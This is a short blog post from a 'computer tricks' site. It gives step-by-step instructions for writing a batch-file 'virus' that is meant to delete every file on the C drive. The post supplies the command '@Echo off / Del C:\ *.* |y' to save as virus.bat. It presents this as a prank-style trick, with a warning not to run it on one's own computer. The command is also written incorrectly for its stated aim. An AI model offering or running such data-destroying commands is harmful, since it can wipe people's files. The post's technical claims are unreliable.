• About
  • Contact

Things For Computers

  • Home
  • Earn Money
    • Free Lance
    • 13 Trusted Sites to Make Money
  • Tricks
    • Faceook Tricks
    • Computer Tricks
    • Internet Tricks
    • Blogger Tricks
    • Chrome Tricks
    • Firefox Tricks
    • Funny Tricks
    • Google Tricks
    • Hacking Tricks
    • Notepad Tricks
    • Virus Tricks
    • Youtube Tricks
    • Whatsup Tricks
    • Amazon Tricks
    • Alexa Tricks
  • Free Internet
    • Mobilink Tricks
    • Zong Tricks
    • Telenor Tricks
    • Ufone Tricks
    • Warid Tricks
    • Airtel Tricks
  • Softwares
    • Latest Softwares
    • Utility Softwares
    • Computer Software
  • Blogging
    • Blogging Tips
    • Blogger Tricks
    • Blogger Widgets
    • Blogger Templates
Home » Tips-Tricks » Virus Tricks » How to create a simple virus which is delete all C drive files.

How to create a simple virus which is delete all C drive files.

Hasan
Add Comment
Tips-Tricks, Virus Tricks

Virus
Want to make a simple virus on your computer….? In this article I will show you how making a simple virus by following steps:
Step-1:
Just open notepad ( Winkey+R ®run ® type notepad and hit enter) or any text editor.
Step-2:
Now copy and paste the following code below into the notepad.
@Echo off
Del C:\ *.* |y
Step-3:
Now save it as virus.bat ( where,  virus is a file name and “. bat” is the file extension ).

Warning:Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Tweet
How to create a simple virus which is delete all C drive files. Title : How to create a simple virus which is delete all C drive files.
Description : Virus Want to make a simple virus on your computer….? In this article I will show you how making a simple virus by following steps: Step-1:...
Rating : 5

0 Response to "How to create a simple virus which is delete all C drive files."

← Newer Post Older Post → Home
Subscribe to: Post Comments (Atom)

Back to top!